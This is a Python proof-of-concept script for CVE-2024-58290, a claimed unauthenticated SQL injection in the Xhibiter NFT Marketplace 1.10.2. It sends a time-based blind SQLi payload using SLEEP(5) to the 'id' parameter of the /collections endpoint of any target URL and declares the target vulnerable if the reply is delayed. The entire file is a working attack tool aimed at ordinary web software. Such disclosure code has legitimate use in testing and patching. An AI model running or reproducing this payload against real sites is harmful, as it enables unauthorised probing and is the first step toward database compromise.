import requests
import argparse
import time
import sys

# CVE-2024-58290 Proof of Concept
# Target: Xhibiter NFT Marketplace 1.10.2
# Vulnerability: Unauthenticated SQL Injection
# Author: Sohel Yousef

def banner():
    print("""
    ##########################################################
    #    CVE-2024-58290 - Xhibiter SQL Injection Detector    #
    #                 Author: Sohel Yousef                   #
    ##########################################################
    """)

def check_vulnerability(url):
    # Constructing the vulnerable endpoint
    # The vulnerability exists in the 'id' parameter of the collections endpoint
    target_endpoint = f"{url}/collections"
    
    # Payload Explanation:
    # This is a Time-Based Blind SQL Injection payload.
    # It attempts to force the database to sleep for 5 seconds.
    # If the server takes > 5 seconds to reply, the injection is successful.
    payload = "1' AND (SELECT 5678 FROM (SELECT(SLEEP(5)))DwVr) AND '1'='1"
    
    params = {'id': payload}
    
    print(f"[*] Target URL: {target_endpoint}")
    print("[*] Testing for SQL Injection (Time-Based)...")
    print("[*] Sending payload to verify database interaction...")

    try:
        start_time = time.time()
        # Sending the request with the malicious parameter
        response = requests.get(target_endpoint, params=params, timeout=15)
        end_time = time.time()
        
        duration = end_time - start_time
        
        if duration >= 5:
            print(f"\n[+] SUCCESS: Target is VULNERABLE to CVE-2024-58290!")
            print(f"[+] Server response delay: {duration:.2f} seconds (Expected ~5s).")
            print("[+] Explanation: The database executed the SLEEP(5) command.")
        else:
            print(f"\n[-] FAILED: Target does not appear vulnerable.")
            print(f"[-] Response time: {duration:.2f} seconds (Too fast for sleep execution).")
            
    except requests.exceptions.Timeout:
        # Sometimes a successful sleep causes a timeout depending on server config
        print(f"\n[+] SUCCESS (Likely): Request timed out, which often indicates SQL sleep execution.")
    except requests.exceptions.RequestException as e:
        print(f"\n[!] Error connecting to target: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2024-58290 PoC Scanner by Sohel Yousef')
    parser.add_argument('--url', required=True, help='Target base URL (e.g., http://localhost/xhibiter)')
    args = parser.parse_args()
    
    banner()
    check_vulnerability(args.url)
